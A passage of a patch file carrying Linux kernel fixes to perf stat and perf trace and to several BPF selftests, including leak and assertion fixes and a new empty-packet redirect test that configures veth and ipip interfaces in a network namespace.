+diff --git a/tools/perf/builtin-stat.c b/tools/perf/builtin-stat.c
+index 265b051579726..978fdc60b4e84 100644
+--- a/tools/perf/builtin-stat.c
++++ b/tools/perf/builtin-stat.c
+@@ -528,26 +528,14 @@ static int enable_counters(void)
+ 			return err;
+ 	}
+ 
+-	if (stat_config.initial_delay < 0) {
+-		pr_info(EVLIST_DISABLED_MSG);
+-		return 0;
+-	}
+-
+-	if (stat_config.initial_delay > 0) {
+-		pr_info(EVLIST_DISABLED_MSG);
+-		usleep(stat_config.initial_delay * USEC_PER_MSEC);
+-	}
+-
+ 	/*
+ 	 * We need to enable counters only if:
+ 	 * - we don't have tracee (attaching to task or cpu)
+ 	 * - we have initial delay configured
+ 	 */
+-	if (!target__none(&target) || stat_config.initial_delay) {
++	if (!target__none(&target)) {
+ 		if (!all_counters_use_bpf)
+ 			evlist__enable(evsel_list);
+-		if (stat_config.initial_delay > 0)
+-			pr_info(EVLIST_ENABLED_MSG);
+ 	}
+ 	return 0;
+ }
+@@ -918,14 +906,27 @@ try_again_reset:
+ 			return err;
+ 	}
+ 
+-	err = enable_counters();
+-	if (err)
+-		return -1;
++	if (stat_config.initial_delay) {
++		pr_info(EVLIST_DISABLED_MSG);
++	} else {
++		err = enable_counters();
++		if (err)
++			return -1;
++	}
+ 
+ 	/* Exec the command, if any */
+ 	if (forks)
+ 		evlist__start_workload(evsel_list);
+ 
++	if (stat_config.initial_delay > 0) {
++		usleep(stat_config.initial_delay * USEC_PER_MSEC);
++		err = enable_counters();
++		if (err)
++			return -1;
++
++		pr_info(EVLIST_ENABLED_MSG);
++	}
++
+ 	t0 = rdclock();
+ 	clock_gettime(CLOCK_MONOTONIC, &ref_time);
+ 
+@@ -1023,7 +1024,7 @@ static void print_counters(struct timespec *ts, int argc, const char **argv)
+ 	/* Do not print anything if we record to the pipe. */
+ 	if (STAT_RECORD && perf_stat.data.is_pipe)
+ 		return;
+-	if (stat_config.quiet)
++	if (quiet)
+ 		return;
+ 
+ 	evlist__print_counters(evsel_list, &stat_config, &target, ts, argc, argv);
+@@ -1273,8 +1274,8 @@ static struct option stat_options[] = {
+ 		       "print summary for interval mode"),
+ 	OPT_BOOLEAN(0, "no-csv-summary", &stat_config.no_csv_summary,
+ 		       "don't print 'summary' for CSV summary output"),
+-	OPT_BOOLEAN(0, "quiet", &stat_config.quiet,
+-			"don't print output (useful with record)"),
++	OPT_BOOLEAN(0, "quiet", &quiet,
++			"don't print any output, messages or warnings (useful with record)"),
+ 	OPT_CALLBACK(0, "cputype", &evsel_list, "hybrid cpu type",
+ 		     "Only enable events on applying cpu with this type "
+ 		     "for hybrid platform (e.g. core or atom)",
+@@ -2277,7 +2278,7 @@ int cmd_stat(int argc, const char **argv)
+ 		goto out;
+ 	}
+ 
+-	if (!output && !stat_config.quiet) {
++	if (!output && !quiet) {
+ 		struct timespec tm;
+ 		mode = append_file ? "a" : "w";
+ 
+diff --git a/tools/perf/builtin-trace.c b/tools/perf/builtin-trace.c
+index d3c757769b965..3dcf6aed1ef71 100644
+--- a/tools/perf/builtin-trace.c
++++ b/tools/perf/builtin-trace.c
+@@ -88,6 +88,8 @@
+ # define F_LINUX_SPECIFIC_BASE	1024
+ #endif
+ 
++#define RAW_SYSCALL_ARGS_NUM	6
++
+ /*
+  * strtoul: Go from a string to a value, i.e. for msr: MSR_FS_BASE to 0xc0000100
+  */
+@@ -108,7 +110,7 @@ struct syscall_fmt {
+ 		const char *sys_enter,
+ 			   *sys_exit;
+ 	}	   bpf_prog_name;
+-	struct syscall_arg_fmt arg[6];
++	struct syscall_arg_fmt arg[RAW_SYSCALL_ARGS_NUM];
+ 	u8	   nr_args;
+ 	bool	   errpid;
+ 	bool	   timeout;
+@@ -1226,7 +1228,7 @@ struct syscall {
+  */
+ struct bpf_map_syscall_entry {
+ 	bool	enabled;
+-	u16	string_args_len[6];
++	u16	string_args_len[RAW_SYSCALL_ARGS_NUM];
+ };
+ 
+ /*
+@@ -1658,7 +1660,7 @@ static int syscall__alloc_arg_fmts(struct syscall *sc, int nr_args)
+ {
+ 	int idx;
+ 
+-	if (nr_args == 6 && sc->fmt && sc->fmt->nr_args != 0)
++	if (nr_args == RAW_SYSCALL_ARGS_NUM && sc->fmt && sc->fmt->nr_args != 0)
+ 		nr_args = sc->fmt->nr_args;
+ 
+ 	sc->arg_fmt = calloc(nr_args, sizeof(*sc->arg_fmt));
+@@ -1791,11 +1793,11 @@ static int trace__read_syscall_info(struct trace *trace, int id)
+ #endif
+ 	sc = trace->syscalls.table + id;
+ 	if (sc->nonexistent)
+-		return 0;
++		return -EEXIST;
+ 
+ 	if (name == NULL) {
+ 		sc->nonexistent = true;
+-		return 0;
++		return -EEXIST;
+ 	}
+ 
+ 	sc->name = name;
+@@ -1809,11 +1811,18 @@ static int trace__read_syscall_info(struct trace *trace, int id)
+ 		sc->tp_format = trace_event__tp_format("syscalls", tp_name);
+ 	}
+ 
+-	if (syscall__alloc_arg_fmts(sc, IS_ERR(sc->tp_format) ? 6 : sc->tp_format->format.nr_fields))
+-		return -ENOMEM;
+-
+-	if (IS_ERR(sc->tp_format))
++	/*
++	 * Fails to read trace point format via sysfs node, so the trace point
++	 * doesn't exist.  Set the 'nonexistent' flag as true.
++	 */
++	if (IS_ERR(sc->tp_format)) {
++		sc->nonexistent = true;
+ 		return PTR_ERR(sc->tp_format);
++	}
++
++	if (syscall__alloc_arg_fmts(sc, IS_ERR(sc->tp_format) ?
++					RAW_SYSCALL_ARGS_NUM : sc->tp_format->format.nr_fields))
++		return -ENOMEM;
+ 
+ 	sc->args = sc->tp_format->format.fields;
+ 	/*
+@@ -2131,11 +2140,8 @@ static struct syscall *trace__syscall_info(struct trace *trace,
+ 	    (err = trace__read_syscall_info(trace, id)) != 0)
+ 		goto out_cant_read;
+ 
+-	if (trace->syscalls.table[id].name == NULL) {
+-		if (trace->syscalls.table[id].nonexistent)
+-			return NULL;
++	if (trace->syscalls.table && trace->syscalls.table[id].nonexistent)
+ 		goto out_cant_read;
+-	}
+ 
+ 	return &trace->syscalls.table[id];
+ 
+diff --git a/tools/perf/tests/shell/stat_all_pmu.sh b/tools/perf/tests/shell/stat_all_pmu.sh
+index 9c9ef33e0b3c6..c779554191731 100755
+--- a/tools/perf/tests/shell/stat_all_pmu.sh
++++ b/tools/perf/tests/shell/stat_all_pmu.sh
+@@ -4,17 +4,8 @@
+ 
+ set -e
+ 
+-for p in $(perf list --raw-dump pmu); do
+-  # In powerpc, skip the events for hv_24x7 and hv_gpci.
+-  # These events needs input values to be filled in for
+-  # core, chip, partition id based on system.
+-  # Example: hv_24x7/CPM_ADJUNCT_INST,domain=?,core=?/
+-  # hv_gpci/event,partition_id=?/
+-  # Hence skip these events for ppc.
+-  if echo "$p" |grep -Eq 'hv_24x7|hv_gpci' ; then
+-    echo "Skipping: Event '$p' in powerpc"
+-    continue
+-  fi
++# Test all PMU events; however exclude parametrized ones (name contains '?')
++for p in $(perf list --raw-dump pmu | sed 's/[[:graph:]]\+?[[:graph:]]\+[[:space:]]//g'); do
+   echo "Testing $p"
+   result=$(perf stat -e "$p" true 2>&1)
+   if ! echo "$result" | grep -q "$p" && ! echo "$result" | grep -q "<not supported>" ; then
+diff --git a/tools/perf/ui/util.c b/tools/perf/ui/util.c
+index 689b27c34246c..1d38ddf01b604 100644
+--- a/tools/perf/ui/util.c
++++ b/tools/perf/ui/util.c
+@@ -15,6 +15,9 @@ static int perf_stdio__error(const char *format, va_list args)
+ 
+ static int perf_stdio__warning(const char *format, va_list args)
+ {
++	if (quiet)
++		return 0;
++
+ 	fprintf(stderr, "Warning:\n");
+ 	vfprintf(stderr, format, args);
+ 	return 0;
+@@ -45,6 +48,8 @@ int ui__warning(const char *format, ...)
+ {
+ 	int ret;
+ 	va_list args;
++	if (quiet)
++		return 0;
+ 
+ 	va_start(args, format);
+ 	ret = perf_eops->warning(format, args);
+diff --git a/tools/perf/util/bpf_off_cpu.c b/tools/perf/util/bpf_off_cpu.c
+index c257813e674ef..01f70b8e705a8 100644
+--- a/tools/perf/util/bpf_off_cpu.c
++++ b/tools/perf/util/bpf_off_cpu.c
+@@ -102,7 +102,7 @@ static void check_sched_switch_args(void)
+ 	const struct btf_type *t1, *t2, *t3;
+ 	u32 type_id;
+ 
+-	type_id = btf__find_by_name_kind(btf, "bpf_trace_sched_switch",
++	type_id = btf__find_by_name_kind(btf, "btf_trace_sched_switch",
+ 					 BTF_KIND_TYPEDEF);
+ 	if ((s32)type_id < 0)
+ 		return;
+diff --git a/tools/perf/util/branch.h b/tools/perf/util/branch.h
+index f838b23db1804..dca75cad96f68 100644
+--- a/tools/perf/util/branch.h
++++ b/tools/perf/util/branch.h
+@@ -24,9 +24,10 @@ struct branch_flags {
+ 			u64 abort:1;
+ 			u64 cycles:16;
+ 			u64 type:4;
++			u64 spec:2;
+ 			u64 new_type:4;
+ 			u64 priv:3;
+-			u64 reserved:33;
++			u64 reserved:31;
+ 		};
+ 	};
+ };
+diff --git a/tools/perf/util/debug.c b/tools/perf/util/debug.c
+index 65e6c22f38e4f..190e818a07176 100644
+--- a/tools/perf/util/debug.c
++++ b/tools/perf/util/debug.c
+@@ -241,6 +241,10 @@ int perf_quiet_option(void)
+ 		opt++;
+ 	}
+ 
++	/* For debug variables that are used as bool types, set to 0. */
++	redirect_to_stderr = 0;
++	debug_peo_args = 0;
++
+ 	return 0;
+ }
+ 
+diff --git a/tools/perf/util/stat-display.c b/tools/perf/util/stat-display.c
+index ba66bb7fc1ca7..bc866d18973e4 100644
+--- a/tools/perf/util/stat-display.c
++++ b/tools/perf/util/stat-display.c
+@@ -704,7 +704,7 @@ static void uniquify_event_name(struct evsel *counter)
+ 			counter->name = new_name;
+ 		}
+ 	} else {
+-		if (perf_pmu__has_hybrid()) {
++		if (evsel__is_hybrid(counter)) {
+ 			ret = asprintf(&new_name, "%s/%s/",
+ 				       counter->pmu_name, counter->name);
+ 		} else {
+@@ -744,26 +744,14 @@ static void collect_all_aliases(struct perf_stat_config *config, struct evsel *c
+ 	}
+ }
+ 
+-static bool is_uncore(struct evsel *evsel)
+-{
+-	struct perf_pmu *pmu = evsel__find_pmu(evsel);
+-
+-	return pmu && pmu->is_uncore;
+-}
+-
+-static bool hybrid_uniquify(struct evsel *evsel)
+-{
+-	return perf_pmu__has_hybrid() && !is_uncore(evsel);
+-}
+-
+ static bool hybrid_merge(struct evsel *counter, struct perf_stat_config *config,
+ 			 bool check)
+ {
+-	if (hybrid_uniquify(counter)) {
++	if (evsel__is_hybrid(counter)) {
+ 		if (check)
+-			return config && config->hybrid_merge;
++			return config->hybrid_merge;
+ 		else
+-			return config && !config->hybrid_merge;
++			return !config->hybrid_merge;
+ 	}
+ 
+ 	return false;
+@@ -1142,11 +1130,16 @@ static void print_metric_headers(struct perf_stat_config *config,
+ 				 struct evlist *evlist,
+ 				 const char *prefix, bool no_indent)
+ {
+-	struct perf_stat_output_ctx out;
+ 	struct evsel *counter;
+ 	struct outstate os = {
+ 		.fh = config->output
+ 	};
++	struct perf_stat_output_ctx out = {
++		.ctx = &os,
++		.print_metric = print_metric_header,
++		.new_line = new_line_metric,
++		.force_header = true,
++	};
+ 	bool first = true;
+ 
+ 		if (config->json_output && !config->interval)
+@@ -1170,13 +1163,11 @@ static void print_metric_headers(struct perf_stat_config *config,
+ 	/* Print metrics headers only */
+ 	evlist__for_each_entry(evlist, counter) {
+ 		os.evsel = counter;
+-		out.ctx = &os;
+-		out.print_metric = print_metric_header;
++
+ 		if (!first && config->json_output)
+ 			fprintf(config->output, ", ");
+ 		first = false;
+-		out.new_line = new_line_metric;
+-		out.force_header = true;
++
+ 		perf_stat__print_shadow_stats(config, counter, 0,
+ 					      0,
+ 					      &out,
+diff --git a/tools/perf/util/stat.h b/tools/perf/util/stat.h
+index b0899c6e002f5..35c940d7f29cd 100644
+--- a/tools/perf/util/stat.h
++++ b/tools/perf/util/stat.h
+@@ -139,7 +139,6 @@ struct perf_stat_config {
+ 	bool			 metric_no_group;
+ 	bool			 metric_no_merge;
+ 	bool			 stop_read_counter;
+-	bool			 quiet;
+ 	bool			 iostat_run;
+ 	char			 *user_requested_cpu_list;
+ 	bool			 system_wide;
+diff --git a/tools/perf/util/symbol-elf.c b/tools/perf/util/symbol-elf.c
+index 647b7dff8ef36..80345695b1360 100644
+--- a/tools/perf/util/symbol-elf.c
++++ b/tools/perf/util/symbol-elf.c
+@@ -1303,7 +1303,7 @@ dso__load_sym_internal(struct dso *dso, struct map *map, struct symsrc *syms_ss,
+ 			   (!used_opd && syms_ss->adjust_symbols)) {
+ 			GElf_Phdr phdr;
+ 
+-			if (elf_read_program_header(syms_ss->elf,
++			if (elf_read_program_header(runtime_ss->elf,
+ 						    (u64)sym.st_value, &phdr)) {
+ 				pr_debug4("%s: failed to find program header for "
+ 					   "symbol: %s st_value: %#" PRIx64 "\n",
+diff --git a/tools/testing/selftests/bpf/config b/tools/testing/selftests/bpf/config
+index 9213565c03117..59cec4244b3a7 100644
+--- a/tools/testing/selftests/bpf/config
++++ b/tools/testing/selftests/bpf/config
+@@ -13,6 +13,7 @@ CONFIG_CRYPTO_USER_API_HASH=y
+ CONFIG_DYNAMIC_FTRACE=y
+ CONFIG_FPROBE=y
+ CONFIG_FTRACE_SYSCALLS=y
++CONFIG_FUNCTION_ERROR_INJECTION=y
+ CONFIG_FUNCTION_TRACER=y
+ CONFIG_GENEVE=y
+ CONFIG_IKCONFIG=y
+diff --git a/tools/testing/selftests/bpf/network_helpers.c b/tools/testing/selftests/bpf/network_helpers.c
+index bec15558fd938..1f37adff7632c 100644
+--- a/tools/testing/selftests/bpf/network_helpers.c
++++ b/tools/testing/selftests/bpf/network_helpers.c
+@@ -426,6 +426,10 @@ static int setns_by_fd(int nsfd)
+ 	if (!ASSERT_OK(err, "mount /sys/fs/bpf"))
+ 		return err;
+ 
++	err = mount("debugfs", "/sys/kernel/debug", "debugfs", 0, NULL);
++	if (!ASSERT_OK(err, "mount /sys/kernel/debug"))
++		return err;
++
+ 	return 0;
+ }
+ 
+diff --git a/tools/testing/selftests/bpf/prog_tests/bpf_iter.c b/tools/testing/selftests/bpf/prog_tests/bpf_iter.c
+index 3369c5ec3a17c..ecde236047fe1 100644
+--- a/tools/testing/selftests/bpf/prog_tests/bpf_iter.c
++++ b/tools/testing/selftests/bpf/prog_tests/bpf_iter.c
+@@ -1498,7 +1498,6 @@ static noinline int trigger_func(int arg)
+ static void test_task_vma_offset_common(struct bpf_iter_attach_opts *opts, bool one_proc)
+ {
+ 	struct bpf_iter_vma_offset *skel;
+-	struct bpf_link *link;
+ 	char buf[16] = {};
+ 	int iter_fd, len;
+ 	int pgsz, shift;
+@@ -1513,11 +1512,11 @@ static void test_task_vma_offset_common(struct bpf_iter_attach_opts *opts, bool
+ 		;
+ 	skel->bss->page_shift = shift;
+ 
+-	link = bpf_program__attach_iter(skel->progs.get_vma_offset, opts);
+-	if (!ASSERT_OK_PTR(link, "attach_iter"))
+-		return;
++	skel->links.get_vma_offset = bpf_program__attach_iter(skel->progs.get_vma_offset, opts);
++	if (!ASSERT_OK_PTR(skel->links.get_vma_offset, "attach_iter"))
++		goto exit;
+ 
+-	iter_fd = bpf_iter_create(bpf_link__fd(link));
++	iter_fd = bpf_iter_create(bpf_link__fd(skel->links.get_vma_offset));
+ 	if (!ASSERT_GT(iter_fd, 0, "create_iter"))
+ 		goto exit;
+ 
+@@ -1535,7 +1534,7 @@ static void test_task_vma_offset_common(struct bpf_iter_attach_opts *opts, bool
+ 	close(iter_fd);
+ 
+ exit:
+-	bpf_link__destroy(link);
++	bpf_iter_vma_offset__destroy(skel);
+ }
+ 
+ static void test_task_vma_offset(void)
+diff --git a/tools/testing/selftests/bpf/prog_tests/empty_skb.c b/tools/testing/selftests/bpf/prog_tests/empty_skb.c
+new file mode 100644
+index 0000000000000..0613f3bb8b5e4
+--- /dev/null
++++ b/tools/testing/selftests/bpf/prog_tests/empty_skb.c
+@@ -0,0 +1,146 @@
++// SPDX-License-Identifier: GPL-2.0
++#include <test_progs.h>
++#include <network_helpers.h>
++#include <net/if.h>
++#include "empty_skb.skel.h"
++
++#define SYS(cmd) ({ \
++	if (!ASSERT_OK(system(cmd), (cmd))) \
++		goto out; \
++})
++
++void serial_test_empty_skb(void)
++{
++	LIBBPF_OPTS(bpf_test_run_opts, tattr);
++	struct empty_skb *bpf_obj = NULL;
++	struct nstoken *tok = NULL;
++	struct bpf_program *prog;
++	char eth_hlen_pp[15];
++	char eth_hlen[14];
++	int veth_ifindex;
++	int ipip_ifindex;
++	int err;
++	int i;
++
++	struct {
++		const char *msg;
++		const void *data_in;
++		__u32 data_size_in;
++		int *ifindex;
++		int err;
++		int ret;
++		bool success_on_tc;
++	} tests[] = {
++		/* Empty packets are always rejected. */
++
++		{
++			/* BPF_PROG_RUN ETH_HLEN size check */
++			.msg = "veth empty ingress packet",
++			.data_in = NULL,
++			.data_size_in = 0,
++			.ifindex = &veth_ifindex,
++			.err = -EINVAL,
++		},
++		{
++			/* BPF_PROG_RUN ETH_HLEN size check */
++			.msg = "ipip empty ingress packet",
++			.data_in = NULL,
++			.data_size_in = 0,
++			.ifindex = &ipip_ifindex,
++			.err = -EINVAL,
++		},
++
++		/* ETH_HLEN-sized packets:
++		 * - can not be redirected at LWT_XMIT
++		 * - can be redirected at TC to non-tunneling dest
++		 */
++
++		{
++			/* __bpf_redirect_common */
++			.msg = "veth ETH_HLEN packet ingress",
++			.data_in = eth_hlen,
++			.data_size_in = sizeof(eth_hlen),
++			.ifindex = &veth_ifindex,
++			.ret = -ERANGE,
++			.success_on_tc = true,
++		},
++		{
++			/* __bpf_redirect_no_mac
++			 *
++			 * lwt: skb->len=0 <= skb_network_offset=0
++			 * tc: skb->len=14 <= skb_network_offset=14
++			 */
++			.msg = "ipip ETH_HLEN packet ingress",
++			.data_in = eth_hlen,
++			.data_size_in = sizeof(eth_hlen),
++			.ifindex = &ipip_ifindex,
++			.ret = -ERANGE,
++		},
++
++		/* ETH_HLEN+1-sized packet should be redirected. */
++
++		{
++			.msg = "veth ETH_HLEN+1 packet ingress",
++			.data_in = eth_hlen_pp,
++			.data_size_in = sizeof(eth_hlen_pp),
++			.ifindex = &veth_ifindex,
++		},
++		{
++			.msg = "ipip ETH_HLEN+1 packet ingress",
++			.data_in = eth_hlen_pp,
++			.data_size_in = sizeof(eth_hlen_pp),
++			.ifindex = &ipip_ifindex,
++		},
++	};
++
++	SYS("ip netns add empty_skb");
++	tok = open_netns("empty_skb");
++	SYS("ip link add veth0 type veth peer veth1");
++	SYS("ip link set dev veth0 up");
++	SYS("ip link set dev veth1 up");
++	SYS("ip addr add 10.0.0.1/8 dev veth0");
++	SYS("ip addr add 10.0.0.2/8 dev veth1");
++	veth_ifindex = if_nametoindex("veth0");
++
++	SYS("ip link add ipip0 type ipip local 10.0.0.1 remote 10.0.0.2");
++	SYS("ip link set ipip0 up");
++	SYS("ip addr add 192.168.1.1/16 dev ipip0");
++	ipip_ifindex = if_nametoindex("ipip0");
++
++	bpf_obj = empty_skb__open_and_load();
++	if (!ASSERT_OK_PTR(bpf_obj, "open skeleton"))
++		goto out;
++
++	for (i = 0; i < ARRAY_SIZE(tests); i++) {
++		bpf_object__for_each_program(prog, bpf_obj->obj) {
++			char buf[128];
++			bool at_tc = !strncmp(bpf_program__section_name(prog), "tc", 2);
++
++			tattr.data_in = tests[i].data_in;
++			tattr.data_size_in = tests[i].data_size_in;
++
++			tattr.data_size_out = 0;
++			bpf_obj->bss->ifindex = *tests[i].ifindex;
++			bpf_obj->bss->ret = 0;
++			err = bpf_prog_test_run_opts(bpf_program__fd(prog), &tattr);
++			sprintf(buf, "err: %s [%s]", tests[i].msg, bpf_program__name(prog));
++
++			if (at_tc && tests[i].success_on_tc)
++				ASSERT_GE(err, 0, buf);
++			else
++				ASSERT_EQ(err, tests[i].err, buf);
++			sprintf(buf, "ret: %s [%s]", tests[i].msg, bpf_program__name(prog));
++			if (at_tc && tests[i].success_on_tc)
++				ASSERT_GE(bpf_obj->bss->ret, 0, buf);
++			else
++				ASSERT_EQ(bpf_obj->bss->ret, tests[i].ret, buf);
++		}
++	}
++
++out:
++	if (bpf_obj)
++		empty_skb__destroy(bpf_obj);
++	if (tok)
++		close_netns(tok);
++	system("ip netns del empty_skb");
++}
+diff --git a/tools/testing/selftests/bpf/prog_tests/kprobe_multi_test.c b/tools/testing/selftests/bpf/prog_tests/kprobe_multi_test.c
+index a4b4133d39e95..0d82e28aed1ac 100644
+--- a/tools/testing/selftests/bpf/prog_tests/kprobe_multi_test.c
++++ b/tools/testing/selftests/bpf/prog_tests/kprobe_multi_test.c
+@@ -325,7 +325,7 @@ static bool symbol_equal(const void *key1, const void *key2, void *ctx __maybe_u
+ static int get_syms(char ***symsp, size_t *cntp)
+ {
+ 	size_t cap = 0, cnt = 0, i;
+-	char *name, **syms = NULL;
++	char *name = NULL, **syms = NULL;
+ 	struct hashmap *map;
+ 	char buf[256];
+ 	FILE *f;
+@@ -352,6 +352,8 @@ static int get_syms(char ***symsp, size_t *cntp)
+ 		/* skip modules */
+ 		if (strchr(buf, '['))
+ 			continue;
++
++		free(name);
+ 		if (sscanf(buf, "%ms$*[^\n]\n", &name) != 1)
+ 			continue;
+ 		/*
+@@ -371,32 +373,32 @@ static int get_syms(char ***symsp, size_t *cntp)
+ 		if (!strncmp(name, "__ftrace_invalid_address__",
+ 			     sizeof("__ftrace_invalid_address__") - 1))
+ 			continue;
++
+ 		err = hashmap__add(map, name, NULL);
+-		if (err) {
+-			free(name);
+-			if (err == -EEXIST)
+-				continue;
++		if (err == -EEXIST)
++			continue;
++		if (err)
+ 			goto error;
+-		}
++
+ 		err = libbpf_ensure_mem((void **) &syms, &cap,
+ 					sizeof(*syms), cnt + 1);
+-		if (err) {
+-			free(name);
++		if (err)
+ 			goto error;
+-		}
+-		syms[cnt] = name;
+-		cnt++;
++
++		syms[cnt++] = name;
++		name = NULL;
+ 	}
+ 
+ 	*symsp = syms;
+ 	*cntp = cnt;
+ 
+ error:
++	free(name);
+ 	fclose(f);
+ 	hashmap__free(map);
+ 	if (err) {
+ 		for (i = 0; i < cnt; i++)
+-			free(syms[cnt]);
++			free(syms[i]);
+ 		free(syms);
+ 	}
+ 	return err;
+diff --git a/tools/testing/selftests/bpf/prog_tests/lsm_cgroup.c b/tools/testing/selftests/bpf/prog_tests/lsm_cgroup.c
+index 1102e4f42d2d4..f117bfef68a14 100644
+--- a/tools/testing/selftests/bpf/prog_tests/lsm_cgroup.c
++++ b/tools/testing/selftests/bpf/prog_tests/lsm_cgroup.c
+@@ -173,10 +173,12 @@ static void test_lsm_cgroup_functional(void)
+ 	ASSERT_EQ(query_prog_cnt(cgroup_fd, NULL), 4, "total prog count");
+ 	ASSERT_EQ(query_prog_cnt(cgroup_fd2, NULL), 1, "total prog count");
+ 
+-	/* AF_UNIX is prohibited. */
+-
+ 	fd = socket(AF_UNIX, SOCK_STREAM, 0);
+-	ASSERT_LT(fd, 0, "socket(AF_UNIX)");
++	if (!(skel->kconfig->CONFIG_SECURITY_APPARMOR
++	    || skel->kconfig->CONFIG_SECURITY_SELINUX
++	    || skel->kconfig->CONFIG_SECURITY_SMACK))
++		/* AF_UNIX is prohibited. */
++		ASSERT_LT(fd, 0, "socket(AF_UNIX)");
+ 	close(fd);
+ 
+ 	/* AF_INET6 gets default policy (sk_priority). */
+@@ -233,11 +235,18 @@ static void test_lsm_cgroup_functional(void)
+ 
+ 	/* AF_INET6+SOCK_STREAM
+ 	 * AF_PACKET+SOCK_RAW
++	 * AF_UNIX+SOCK_RAW if already have non-bpf lsms installed
+ 	 * listen_fd
+ 	 * client_fd
+ 	 * accepted_fd
+ 	 */
+-	ASSERT_EQ(skel->bss->called_socket_post_create2, 5, "called_create2");
++	if (skel->kconfig->CONFIG_SECURITY_APPARMOR
++	    || skel->kconfig->CONFIG_SECURITY_SELINUX
++	    || skel->kconfig->CONFIG_SECURITY_SMACK)
++		/* AF_UNIX+SOCK_RAW if already have non-bpf lsms installed */
++		ASSERT_EQ(skel->bss->called_socket_post_create2, 6, "called_create2");
++	else
++		ASSERT_EQ(skel->bss->called_socket_post_create2, 5, "called_create2");
+ 
+ 	/* start_server
+ 	 * bind(ETH_P_ALL)
+diff --git a/tools/testing/selftests/bpf/prog_tests/map_kptr.c b/tools/testing/selftests/bpf/prog_tests/map_kptr.c
+index fdcea7a61491e..0d66b15242089 100644
+--- a/tools/testing/selftests/bpf/prog_tests/map_kptr.c
++++ b/tools/testing/selftests/bpf/prog_tests/map_kptr.c
+@@ -105,7 +105,7 @@ static void test_map_kptr_success(bool test_run)
+ 	ASSERT_OK(opts.retval, "test_map_kptr_ref2 retval");
+ 
+ 	if (test_run)
+-		return;
++		goto exit;
+ 
+ 	ret = bpf_map__update_elem(skel->maps.array_map,
+ 				   &key, sizeof(key), buf, sizeof(buf), 0);
+@@ -132,6 +132,7 @@ static void test_map_kptr_success(bool test_run)
+ 	ret = bpf_map__delete_elem(skel->maps.lru_hash_map, &key, sizeof(key), 0);
+ 	ASSERT_OK(ret, "lru_hash_map delete");
+ 
++exit:
+ 	map_kptr__destroy(skel);
+ }
+ 
+diff --git a/tools/testing/selftests/bpf/prog_tests/tcp_hdr_options.c b/tools/testing/selftests/bpf/prog_tests/tcp_hdr_options.c
+index 617bbce6ef8f1..57191773572a0 100644
+--- a/tools/testing/selftests/bpf/prog_tests/tcp_hdr_options.c
++++ b/tools/testing/selftests/bpf/prog_tests/tcp_hdr_options.c
+@@ -485,7 +485,7 @@ static void misc(void)
+ 			goto check_linum;
+ 
+ 		ret = read(sk_fds.passive_fd, recv_msg, sizeof(recv_msg));
+-		if (ASSERT_EQ(ret, sizeof(send_msg), "read(msg)"))
++		if (!ASSERT_EQ(ret, sizeof(send_msg), "read(msg)"))
+ 			goto check_linum;
+ 	}
+ 
+@@ -539,7 +539,7 @@ void test_tcp_hdr_options(void)
+ 		goto skel_destroy;
+ 
+ 	cg_fd = test__join_cgroup(CG_NAME);
+-	if (ASSERT_GE(cg_fd, 0, "join_cgroup"))
++	if (!ASSERT_GE(cg_fd, 0, "join_cgroup"))
+ 		goto skel_destroy;
+ 
+ 	for (i = 0; i < ARRAY_SIZE(tests); i++) {
+diff --git a/tools/testing/selftests/bpf/prog_tests/tracing_struct.c b/tools/testing/selftests/bpf/prog_tests/tracing_struct.c
+index d5022b91d1e4c..48dc9472e160a 100644
+--- a/tools/testing/selftests/bpf/prog_tests/tracing_struct.c
++++ b/tools/testing/selftests/bpf/prog_tests/tracing_struct.c
+@@ -15,7 +15,7 @@ static void test_fentry(void)
+ 
+ 	err = tracing_struct__attach(skel);
+ 	if (!ASSERT_OK(err, "tracing_struct__attach"))
+-		return;
++		goto destroy_skel;
+ 
+ 	ASSERT_OK(trigger_module_test_read(256), "trigger_read");
+ 
+@@ -54,6 +54,7 @@ static void test_fentry(void)
+ 	ASSERT_EQ(skel->bss->t5_ret, 1, "t5 ret");
+ 
+ 	tracing_struct__detach(skel);
++destroy_skel:
+ 	tracing_struct__destroy(skel);
+ }
+ 
+diff --git a/tools/testing/selftests/bpf/prog_tests/xdp_adjust_tail.c b/tools/testing/selftests/bpf/prog_tests/xdp_adjust_tail.c
+index 9b9cf8458adf8..39973ea1ce433 100644
+--- a/tools/testing/selftests/bpf/prog_tests/xdp_adjust_tail.c
++++ b/tools/testing/selftests/bpf/prog_tests/xdp_adjust_tail.c
+@@ -18,7 +18,7 @@ static void test_xdp_adjust_tail_shrink(void)
+ 	);
+ 
+ 	err = bpf_prog_test_load(file, BPF_PROG_TYPE_XDP, &obj, &prog_fd);
+-	if (ASSERT_OK(err, "test_xdp_adjust_tail_shrink"))
++	if (!ASSERT_OK(err, "test_xdp_adjust_tail_shrink"))
+ 		return;
+ 
+ 	err = bpf_prog_test_run_opts(prog_fd, &topts);
+@@ -53,7 +53,7 @@ static void test_xdp_adjust_tail_grow(void)
+ 	);
+ 
+ 	err = bpf_prog_test_load(file, BPF_PROG_TYPE_XDP, &obj, &prog_fd);
+-	if (ASSERT_OK(err, "test_xdp_adjust_tail_grow"))
++	if (!ASSERT_OK(err, "test_xdp_adjust_tail_grow"))
+ 		return;
+ 
+ 	err = bpf_prog_test_run_opts(prog_fd, &topts);
+@@ -63,6 +63,7 @@ static void test_xdp_adjust_tail_grow(void)
+ 	expect_sz = sizeof(pkt_v6) + 40; /* Test grow with 40 bytes */
+ 	topts.data_in = &pkt_v6;
+ 	topts.data_size_in = sizeof(pkt_v6);
++	topts.data_size_out = sizeof(buf);
+ 	err = bpf_prog_test_run_opts(prog_fd, &topts);
+ 	ASSERT_OK(err, "ipv6");
+ 	ASSERT_EQ(topts.retval, XDP_TX, "ipv6 retval");
+@@ -89,7 +90,7 @@ static void test_xdp_adjust_tail_grow2(void)
+ 	);
+ 
+ 	err = bpf_prog_test_load(file, BPF_PROG_TYPE_XDP, &obj, &prog_fd);
+-	if (ASSERT_OK(err, "test_xdp_adjust_tail_grow"))
++	if (!ASSERT_OK(err, "test_xdp_adjust_tail_grow"))
+ 		return;
+ 
+ 	/* Test case-64 */
+diff --git a/tools/testing/selftests/bpf/prog_tests/xdp_do_redirect.c b/tools/testing/selftests/bpf/prog_tests/xdp_do_redirect.c
+index a50971c6cf4a5..9ac6f6a268db2 100644
+--- a/tools/testing/selftests/bpf/prog_tests/xdp_do_redirect.c
++++ b/tools/testing/selftests/bpf/prog_tests/xdp_do_redirect.c
+@@ -85,7 +85,7 @@ static void test_max_pkt_size(int fd)
+ }
+ 
+ #define NUM_PKTS 10000
+-void test_xdp_do_redirect(void)
++void serial_test_xdp_do_redirect(void)
+ {
